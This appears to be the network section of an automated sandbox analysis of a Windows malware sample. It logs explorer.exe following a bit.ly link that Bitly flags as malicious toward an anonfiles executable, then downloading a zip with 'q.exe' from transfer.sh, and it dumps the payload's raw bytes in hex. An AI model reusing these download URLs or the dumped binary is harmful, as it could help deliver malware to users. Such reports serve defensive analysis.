                                                                                                                                                                                                          2021-12-31 18:23:00 UTC417INData Raw: 00 4d 00 74 00 79 00 5a 00 31 00 46 00 58 00 63 00 42 00 2f 00 4d 00 4e 00 38 00 72 00 5a 00 66 00 32 00 59 00 79 00 6e 00 6e 00 73 00 4d 00 57 00 33 00 45 00 67 00 45 00 57 00 4c 00 32 00 6b 00 50 00 66 00 58 00 69 00 66 00 6b 00 49 00 66 00 4a 00 39 00 75 00 5a 00 2b 00 45 00 47 00 48 00 73 00 47 00 58 00 72 00 61 00 69 00 6a 00 69 00 39 00 56 00 46 00 6d 00 68 00 39 00 43 00 65 00 78 00 48 00 4d 00 4f 00 76 00 69 00 46 00 56 00 64 00 61 00 67 00 4d 00 55 00 65 00 34 00 61 00 63 00 68 00 6f 00 32 00 63 00 37 00 4a 00 4e 00 68 00 42 00 6f 00 69 00 59 00 4f 00 57 00 4e 00 42 00 75 00 74 00 66 00 6a 00 72 00 4e 00 7a 00 73 00 65 00 44 00 76 00 59 00 4d 00 6c 00 30 00 56 00 49 00 79 00 6c 00 56 00 47 00 65 00 51 00 59 00 51 00 4b 00 37 00 67 00 71 00 52 00
                                                                                                                                                                                                          Data Ascii: MtyZ1FXcB/MN8rZf2YynnsMW3EgEWL2kPfXifkIfJ9uZ+EGHsGXraiji9VFmh9CexHMOviFVdagMUe4acho2c7JNhBoiYOWNButfjrNzseDvYMl0VIylVGeQYQK7gqR
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC433INData Raw: 00 59 00 41 00 41 00 2b 00 70 00 68 00 46 00 42 00 68 00 36 00 6e 00 48 00 47 00 41 00 5a 00 6a 00 45 00 76 00 54 00 41 00 49 00 6c 00 4c 00 36 00 69 00 69 00 34 00 44 00 63 00 57 00 65 00 48 00 6c 00 4e 00 73 00 46 00 6b 00 6a 00 2f 00 4b 00 2b 00 36 00 46 00 57 00 63 00 50 00 61 00 4a 00 71 00 4b 00 69 00 66 00 52 00 37 00 53 00 52 00 63 00 77 00 53 00 49 00 64 00 72 00 6d 00 68 00 2b 00 47 00 56 00 4c 00 63 00 66 00 74 00 2f 00 6d 00 4e 00 67 00 62 00 77 00 69 00 58 00 71 00 56 00 67 00 4a 00 59 00 58 00 73 00 68 00 4b 00 47 00 38 00 4c 00 47 00 47 00 57 00 73 00 37 00 4d 00 4e 00 55 00 72 00 46 00 4a 00 6c 00 78 00 56 00 50 00 77 00 71 00 41 00 7a 00 74 00 65 00 4d 00 6b 00 39 00 42 00 65 00 78 00 69 00 6a 00 6a 00 4f 00 54 00 76 00 4c 00 66 00 4d 00
                                                                                                                                                                                                          Data Ascii: YAA+phFBh6nHGAZjEvTAIlL6ii4DcWeHlNsFkj/K+6FWcPaJqKifR7SRcwSIdrmh+GVLcft/mNgbwiXqVgJYXshKG8LGGWs7MNUrFJlxVPwqAzteMk9BexijjOTvLfM
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC449INData Raw: 00 79 00 71 00 41 00 68 00 73 00 4d 00 59 00 37 00 66 00 68 00 73 00 61 00 37 00 4f 00 6f 00 6c 00 37 00 67 00 4d 00 79 00 71 00 49 00 63 00 52 00 61 00 4c 00 74 00 32 00 64 00 36 00 46 00 59 00 73 00 4f 00 7a 00 6a 00 72 00 75 00 6d 00 6c 00 79 00 68 00 71 00 4d 00 46 00 37 00 76 00 36 00 4a 00 5a 00 4b 00 79 00 65 00 6c 00 44 00 45 00 64 00 2f 00 45 00 36 00 58 00 46 00 44 00 74 00 38 00 79 00 54 00 71 00 62 00 45 00 33 00 64 00 50 00 55 00 69 00 4e 00 2f 00 55 00 70 00 5a 00 77 00 76 00 68 00 41 00 78 00 79 00 59 00 2f 00 7a 00 58 00 69 00 33 00 63 00 56 00 56 00 4c 00 34 00 76 00 67 00 4a 00 6a 00 69 00 2f 00 51 00 53 00 4f 00 46 00 38 00 79 00 77 00 6f 00 71 00 64 00 31 00 4e 00 45 00 67 00 6e 00 35 00 7a 00 54 00 50 00 4f 00 32 00 46 00 49 00 51 00
                                                                                                                                                                                                          Data Ascii: yqAhsMY7fhsa7Ool7gMyqIcRaLt2d6FYsOzjrumlyhqMF7v6JZKyelDEd/E6XFDt8yTqbE3dPUiN/UpZwvhAxyY/zXi3cVVL4vgJji/QSOF8ywoqd1NEgn5zTPO2FIQ
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC465INData Raw: 00 4e 00 54 00 4d 00 6a 00 5a 00 36 00 62 00 6e 00 5a 00 66 00 79 00 73 00 7a 00 79 00 79 00 62 00 2b 00 6e 00 31 00 36 00 64 00 69 00 36 00 55 00 62 00 79 00 67 00 54 00 33 00 5a 00 55 00 43 00 46 00 43 00 52 00 2f 00 48 00 30 00 42 00 58 00 4c 00 72 00 63 00 4c 00 44 00 4e 00 37 00 39 00 6f 00 30 00 4e 00 74 00 4d 00 37 00 32 00 31 00 53 00 6c 00 43 00 70 00 77 00 6d 00 79 00 48 00 31 00 6a 00 50 00 42 00 6a 00 69 00 67 00 34 00 47 00 47 00 71 00 50 00 7a 00 30 00 58 00 6f 00 6a 00 51 00 4d 00 71 00 68 00 70 00 51 00 75 00 4b 00 6c 00 31 00 4a 00 38 00 62 00 71 00 36 00 78 00 34 00 38 00 30 00 2b 00 31 00 35 00 76 00 33 00 2f 00 42 00 79 00 64 00 68 00 43 00 69 00 69 00 57 00 6e 00 32 00 32 00 43 00 75 00 49 00 51 00 47 00 72 00 48 00 70 00 75 00 6f 00
                                                                                                                                                                                                          Data Ascii: NTMjZ6bnZfyszyyb+n16di6UbygT3ZUCFCR/H0BXLrcLDN79o0NtM721SlCpwmyH1jPBjig4GGqPz0XojQMqhpQuKl1J8bq6x480+15v3/BydhCiiWn22CuIQGrHpuo
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC481INData Raw: 00 49 00 44 00 52 00 53 00 4a 00 73 00 4a 00 68 00 37 00 43 00 77 00 35 00 73 00 6a 00 48 00 66 00 76 00 49 00 61 00 65 00 76 00 4e 00 32 00 4d 00 39 00 5a 00 5a 00 42 00 2f 00 62 00 38 00 66 00 35 00 66 00 5a 00 6c 00 4c 00 75 00 48 00 5a 00 72 00 42 00 32 00 62 00 32 00 34 00 76 00 37 00 51 00 6a 00 39 00 2f 00 59 00 66 00 39 00 78 00 4b 00 2f 00 72 00 6e 00 34 00 68 00 75 00 47 00 71 00 35 00 72 00 30 00 6e 00 34 00 43 00 49 00 6a 00 55 00 2f 00 4d 00 69 00 52 00 32 00 5a 00 71 00 58 00 64 00 34 00 64 00 56 00 47 00 63 00 58 00 67 00 68 00 37 00 58 00 38 00 53 00 41 00 52 00 58 00 56 00 6e 00 5a 00 47 00 4f 00 49 00 39 00 63 00 50 00 47 00 49 00 6f 00 6e 00 42 00 48 00 6d 00 30 00 61 00 43 00 6a 00 54 00 46 00 30 00 37 00 38 00 43 00 6f 00 2b 00 43 00
                                                                                                                                                                                                          Data Ascii: IDRSJsJh7Cw5sjHfvIaevN2M9ZZB/b8f5fZlLuHZrB2b24v7Qj9/Yf9xK/rn4huGq5r0n4CIjU/MiR2ZqXd4dVGcXgh7X8SARXVnZGOI9cPGIonBHm0aCjTF078Co+C
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC497INData Raw: 00 34 00 72 00 61 00 4c 00 52 00 52 00 50 00 79 00 7a 00 4d 00 39 00 4d 00 7a 00 7a 00 4b 00 69 00 32 00 72 00 69 00 67 00 43 00 79 00 38 00 30 00 72 00 35 00 6c 00 69 00 68 00 78 00 55 00 30 00 33 00 54 00 75 00 67 00 72 00 74 00 56 00 74 00 66 00 43 00 46 00 33 00 32 00 6e 00 38 00 2f 00 68 00 2f 00 64 00 75 00 6f 00 4a 00 69 00 32 00 35 00 55 00 6a 00 47 00 77 00 55 00 44 00 4e 00 7a 00 44 00 41 00 73 00 71 00 35 00 36 00 77 00 46 00 69 00 56 00 42 00 31 00 63 00 56 00 4d 00 32 00 72 00 6d 00 34 00 4d 00 2b 00 6f 00 63 00 7a 00 31 00 31 00 71 00 74 00 74 00 7a 00 35 00 4f 00 38 00 73 00 70 00 4e 00 75 00 50 00 4f 00 49 00 45 00 4a 00 49 00 67 00 68 00 2f 00 4f 00 4d 00 4b 00 44 00 35 00 77 00 31 00 57 00 34 00 4d 00 65 00 76 00 31 00 4e 00 56 00 44 00
                                                                                                                                                                                                          Data Ascii: 4raLRRPyzM9MzzKi2rigCy80r5lihxU03TugrtVtfCF32n8/h/duoJi25UjGwUDNzDAsq56wFiVB1cVM2rm4M+ocz11qttz5O8spNuPOIEJIgh/OMKD5w1W4Mev1NVD
                                                                                                                                                                                                          2021-12-31 18:23:00 UTC513INData Raw: 00 69 00 36 00 78 00 4d 00 55 00 32 00 66 00 70 00 61 00 4f 00 75 00 4d 00 7a 00 63 00 57 00 76 00 74 00 6e 00 52 00 70 00 57 00 61 00 67 00 38 00 56 00 61 00 79 00 76 00 38 00 2f 00 48 00 44 00 6f 00 6d 00 46 00 78 00 78 00 34 00 33 00 66 00 30 00 61 00 69 00 51 00 74 00 4e 00 7a 00 4c 00 68 00 57 00 39 00 64 00 35 00 7a 00 70 00 67 00 61 00 56 00 75 00 46 00 44 00 72 00 56 00 45 00 4a 00 41 00 38 00 70 00 58 00 71 00 47 00 6d 00 57 00 55 00 57 00 42 00 2f 00 2f 00 73 00 33 00 58 00 46 00 67 00 34 00 34 00 39 00 61 00 59 00 4b 00 71 00 45 00 6e 00 4a 00 67 00 4a 00 6d 00 68 00 74 00 39 00 31 00 37 00 63 00 35 00 37 00 52 00 35 00 33 00 5a 00 69 00 2b 00 36 00 4c 00 30 00 42 00 54 00 56 00 65 00 48 00 78 00 68 00 5a 00 6e 00 6c 00 4e 00 49 00 54 00 4b 00
                                                                                                                                                                                                          Data Ascii: i6xMU2fpaOuMzcWvtnRpWag8Vayv8/HDomFxx43f0aiQtNzLhW9d5zpgaVuFDrVEJA8pXqGmWUWB//s3XFg449aYKqEnJgJmht917c57R53Zi+6L0BTVeHxhZnlNITK


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          1192.168.2.34983067.199.248.10443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2021-12-31 18:23:31 UTC526OUTGET /3eHgQQR HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: bit.ly
                                                                                                                                                                                                          2021-12-31 18:23:31 UTC526INHTTP/1.1 302 Found
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:31 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Content-Length: 226
                                                                                                                                                                                                          Cache-Control: private, max-age=90
                                                                                                                                                                                                          Content-Security-Policy: referrer always;
                                                                                                                                                                                                          Location: https://bitly.com/a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe
                                                                                                                                                                                                          Referrer-Policy: unsafe-url
                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                          Alt-Svc: clear
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2021-12-31 18:23:31 UTC527INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 69 74 6c 79 2e 63 6f 6d 2f 61 2f 62 6c 6f 63 6b 65 64 3f 68 61 73 68 3d 33 65 48 67 51 51 52 26 61 6d 70 3b 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 64 6e 2d 31 33 31 2e 61 6e 6f 6e 66 69 6c 65 73 2e 63 6f 6d 25 32 46 50 30 6d 35 77 34 6a 32 78 63 25 32 46 63 61 63 33 65 62 39 38 2d 31 36 34 30 38 35 33 39 38 34 25 32 46 25 34 30 43 72 79 70 74 6f 62 61 74 39 2e 65 78 65 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                          Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://bitly.com/a/blocked?hash=3eHgQQR&amp;url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe">moved here</a></body></html>


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          2192.168.2.34983167.199.248.15443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC527OUTGET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: bitly.com
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC527INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:32 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Content-Length: 5879
                                                                                                                                                                                                          Set-Cookie: anon_u=cHN1X19lOTgzYjgxNi1mMjU0LTRiMmItYWFjNi0wMzI5ZWExN2MxNzc=|1640975012|de5c15ab56e41962f44d4840a6cf96c804364cdf; Domain=bitly.com; expires=Wed, 29 Jun 2022 18:23:32 GMT; httponly; Path=/; secure
                                                                                                                                                                                                          Etag: "c19624a6e02662e870f645f063e54797e509758d"
                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                          P3p: CP="CAO PSA OUR"
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                          Alt-Svc: clear
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC528INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 57 61 72 6e 69 6e 67 21 20 7c 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 61 20 70 72 6f 62 6c 65 6d 20 77 69 74 68 20 74 68 65 20 72 65 71 75 65 73 74 65 64 20 6c 69 6e 6b 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html><head><title>Warning! | There might be a problem with the requested link</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name=
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC528INData Raw: 20 22 50 72 6f 78 69 6d 61 20 4e 6f 76 61 22 3b 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 38 30 30 3b 0a 73 72 63 3a 20 75 72 6c 28 27 2f 73 2f 76 34 36 38 2f 67 72 61 70 68 69 63 73 2f 50 72 6f 78 69 6d 61 4e 6f 76 61 2d 45 78 74 72 61 62 6f 6c 64 2e 6f 74 66 27 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29 3b 0a 7d 0a 62 6f 64 79 2c 0a 68 74 6d 6c 20 7b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 50 72 6f 78 69 6d 61 20 4e 6f 76 61 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 31 3b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63
                                                                                                                                                                                                          Data Ascii: "Proxima Nova";font-weight: 800;src: url('/s/v468/graphics/ProximaNova-Extrabold.otf') format("opentype");}body,html {font-family: "Proxima Nova", Arial, sans-serif;-webkit-font-smoothing: antialiased;font-size: 10px;color: #1d1f21;background-c
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC530INData Raw: 64 69 6e 67 3a 20 37 25 20 35 25 20 31 34 25 20 35 25 3b 0a 7d 0a 2e 68 65 61 64 65 72 20 7b 0a 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 72 65 6d 3b 0a 7d 0a 2e 68 65 61 64 6c 69 6e 65 2d 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 68 65 61 64 6c 69 6e 65 20 7b 0a 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 7d 0a 2e 77 61 72 6e 69 6e 67 2d 69 6d 67 20 7b 0a 77 69 64 74 68 3a 20 35 30 25 3b 0a 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 20 32 72 65 6d 3b 0a 7d 0a 7d 0a 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 35 30 70 78 29 20 7b 0a 2e 77 61 72 6e 69 6e 67 2d 69 6d 67 20 7b 0a 77 69 64 74 68
                                                                                                                                                                                                          Data Ascii: ding: 7% 5% 14% 5%;}.header {margin-bottom: 2rem;}.headline-container {flex-direction: column;justify-content: center;}.headline {width: 100%;}.warning-img {width: 50%;margin: 0 auto 2rem;}}@media (max-width: 750px) {.warning-img {width
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC531INData Raw: 20 6d 61 6c 77 61 72 65 20 28 73 6f 66 74 77 61 72 65 20 64 65 73 69 67 6e 65 64 20 74 6f 20 68 61 72 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 29 2c 20 61 74 74 65 6d 70 74 20 74 6f 20 63 6f 6c 6c 65 63 74 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 0a 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 66 6f 72 20 6e 65 66 61 72 69 6f 75 73 20 70 75 72 70 6f 73 65 73 2c 20 6f 72 20 6f 74 68 65 72 77 69 73 65 20 63 6f 6e 74 61 69 6e 20 68 61 72 6d 66 75 6c 20 61 6e 64 2f 6f 72 20 69 6c 6c 65 67 61 6c 20 63 6f 6e 74 65 6e 74 2e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 54 68 65 20 6c 69 6e 6b 20 6d 61 79 20 62 65 20 61 74 74 65 6d 70 74 69 6e 67 20 74 6f
                                                                                                                                                                                                          Data Ascii: malware (software designed to harm your computer), attempt to collect your personalinformation for nefarious purposes, or otherwise contain harmful and/or illegal content.</li><li>The link may be attempting to
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC531INData Raw: 20 68 69 64 65 20 74 68 65 20 66 69 6e 61 6c 20 64 65 73 74 69 6e 61 74 69 6f 6e 2e 3c 2f 6c 69 3e 0a 3c 6c 69 3e 54 68 65 20 6c 69 6e 6b 20 6d 61 79 20 6c 65 61 64 20 74 6f 20 61 20 66 6f 72 67 65 72 79 20 6f 66 20 61 6e 6f 74 68 65 72 20 77 65 62 73 69 74 65 20 6f 72 20 6d 61 79 20 69 6e 66 72 69 6e 67 65 20 74 68 65 20 72 69 67 68 74 73 20 6f 66 20 6f 74 68 65 72 73 2e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 6c 69 6e 6b 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 42 69 74 6c 79 20 76 69 61 20 3c 73 70 61 6e 3e 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 0a 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65
                                                                                                                                                                                                          Data Ascii: hide the final destination.</li><li>The link may lead to a forgery of another website or may infringe the rights of others.</li></ul><p>If you believe this link has been blocked in error, please contact Bitly via <span><a target="_blank"rel="noopene
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC533INData Raw: 20 54 72 61 63 6b 20 70 61 67 65 20 76 69 65 77 0a 77 2e 67 61 28 27 73 65 6e 64 27 2c 20 27 70 61 67 65 76 69 65 77 27 29 3b 0a 0a 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 76 61 72 20 63 61 74 65 67 6f 72 79 20 3d 20 22 73 70 61 6d 3a 77 61 72 6e 69 6e 67 5f 70 61 67 65 22 2c 0a 73 74 61 74 65 20 3d 20 30 3b 0a 66 75 6e 63 74 69 6f 6e 20 74 72 61 63 6b 48 6f 76 65 72 28 65 29 20 7b 0a 74 72 79 20 7b 0a 73 74 61 74 65 20 3d 20 31 3b 0a 67 61 28 27 73 65 6e 64 27 2c 20 27 65 76 65 6e 74 27 2c 20 63 61 74 65 67 6f 72 79 2c 20 22 53 70 61 6d 20 69 6e 74 65 72 73 74 69
                                                                                                                                                                                                          Data Ascii: Track page vieww.ga('send', 'pageview');})(window,document);</script><script type="text/javascript">(function () {var category = "spam:warning_page",state = 0;function trackHover(e) {try {state = 1;ga('send', 'event', category, "Spam intersti


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                          3192.168.2.349833144.76.136.153443C:\Windows\explorer.exe
                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC534OUTGET /%28/8V4TRR/q.exe%29.zip HTTP/1.1
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                          Host: transfer.sh
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx/1.14.2
                                                                                                                                                                                                          Date: Fri, 31 Dec 2021 18:23:32 GMT
                                                                                                                                                                                                          Content-Type: application/zip
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Disposition: attachment; filename="transfersh-733.zip"
                                                                                                                                                                                                          X-Made-With: <3 by DutchCoders
                                                                                                                                                                                                          X-Served-By: Proudly served by DutchCoders
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC534INData Raw: 65 63 37 0d 0a 50 4b 03 04 14 00 08 00 00 00 f0 92 9f 53 00 00 00 00 00 00 00 00 00 00 00 00 05 00 09 00 71 2e 65 78 65 55 54 05 00 01 a4 4a cf 61 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 c3 e7 f0 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5c 0f 00 00 08 00 00 00 00 00 00 7e 7a 0f 00 00 20 00 00 00 80 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: ec7PKSq.exeUTJaMZ@!L!This program cannot be run in DOS mode.$PEL0\~z @
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC550INData Raw: 0a 5d 03 00 23 00 00 00 00 00 0c 99 40 28 51 02 00 06 69 0c 00 08 23 00 00 00 40 b4 8d 55 41 28 52 02 00 06 69 fe 01 2c 2a 02 7b 1f 00 00 04 23 00 00 00 00 00 00 22 40 28 53 02 00 06 69 6f 4f 00 00 0a 23 00 00 00 00 59 92 55 41 28 54 02 00 06 69 0c 00 08 23 00 00 00 00 00 62 a0 40 28 55 02 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 44 91 40 28 56 02 00 06 69 fe 01 39 ce 1b 00 00 23 00 00 00 00 71 ca 50 41 28 57 02 00 06 69 0c 00 08 23 00 00 00 00 00 76 a3 40 28 58 02 00 06 69 fe 01 2c 28 00 06 23 00 00 00 00 90 aa 11 41 28 59 02 00 06 69 fe 01 39 33 d5 03 00 23 00 00 00 00 00 78 a3 40 28 5a 02 00 06 69 0c 00 08 23 00 00 00 00 00 bc 96 40 28 5b 02 00 06 69 fe 01 2c 28 00 07 23 00 00 00 80 94 70 46 41 28 5c 02 00 06 69 fe 01 39 ff 49 00 00 23 00 00 00 00
                                                                                                                                                                                                          Data Ascii: ]#@(Qi#@UA(Ri,*{#"@(SioO#YUA(Ti#b@(Ui,(#D@(Vi9#qPA(Wi#v@(Xi,(#A(Yi93#x@(Zi#@([i,(#pFA(\i9I#
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC566INData Raw: 99 05 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 70 8f 40 28 9a 05 00 06 69 fe 01 39 26 4f 03 00 23 00 00 00 00 00 34 a3 40 28 9b 05 00 06 69 0c 00 08 23 00 00 00 00 42 36 41 41 28 9c 05 00 06 69 fe 01 2c 20 23 00 00 00 00 22 42 47 41 28 9d 05 00 06 69 0b 23 00 00 00 80 20 3c 41 41 28 9e 05 00 06 69 0c 00 08 23 00 00 00 00 00 6d b0 40 28 9f 05 00 06 69 fe 01 2c 20 23 00 00 00 00 b1 d9 3b 41 28 a0 05 00 06 69 0b 23 00 00 00 00 00 6e b0 40 28 a1 05 00 06 69 0c 00 08 23 00 00 00 10 c3 4f 74 41 28 a2 05 00 06 69 fe 01 2c 20 23 00 00 00 00 40 f8 f3 40 28 a3 05 00 06 69 0a 23 00 00 00 00 04 52 74 41 28 a4 05 00 06 69 0c 00 08 23 00 00 00 00 00 86 ad 40 28 a5 05 00 06 69 fe 01 2c 20 23 00 00 00 00 c8 0b 23 41 28 a6 05 00 06 69 0b 23 00 00 00 00 00 88 ad 40 28
                                                                                                                                                                                                          Data Ascii: i,(#p@(i9&O#4@(i#B6AA(i, #"BGA(i# <AA(i#m@(i, #;A(i#n@(i#OtA(i, #@@(i#RtA(i#@(i, ##A(i#@(
                                                                                                                                                                                                          2021-12-31 18:23:32 UTC582INData Raw: 01 2c 3e 02 7b 0f 00 00 04 23 00 00 00 00 20 91 e2 40 28 e5 08 00 06 69 23 00 00 00 00 00 00 35 40 28 e6 08 00 06 69 73 51 00 00 0a 6f 52 00 00 0a 23 00 00 00 80 44 99 40 41 28 e7 08 00 06 69 0c 00 08 23 00 00 00 00 44 d4 3a 41 28 e8 08 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 74 93 40 28 e9 08 00 06 69 fe 01 39 eb 08 03 00 23 00 00 00 00 00 bc 94 40 28 ea 08 00 06 69 0c 00 08 23 00 00 00 00 00 45 b2 40 28 eb 08 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 c0 77 40 28 ec 08 00 06 69 fe 01 39 7c 9e 00 00 23 00 00 00 40 b2 de 74 41 28 ed 08 00 06 69 0c 00 08 23 00 00 00 00 00 a2 ab 40 28 ee 08 00 06 69 fe 01 2c 28 00 07 23 00 00 00 00 00 90 83 40 28 ef 08 00 06 69 fe 01 39 e7 f2 02 00 23 00 00 00 00 00 a4 ab 40 28 f0 08 00 06 69 0c 00 08 23 00 00 00 00
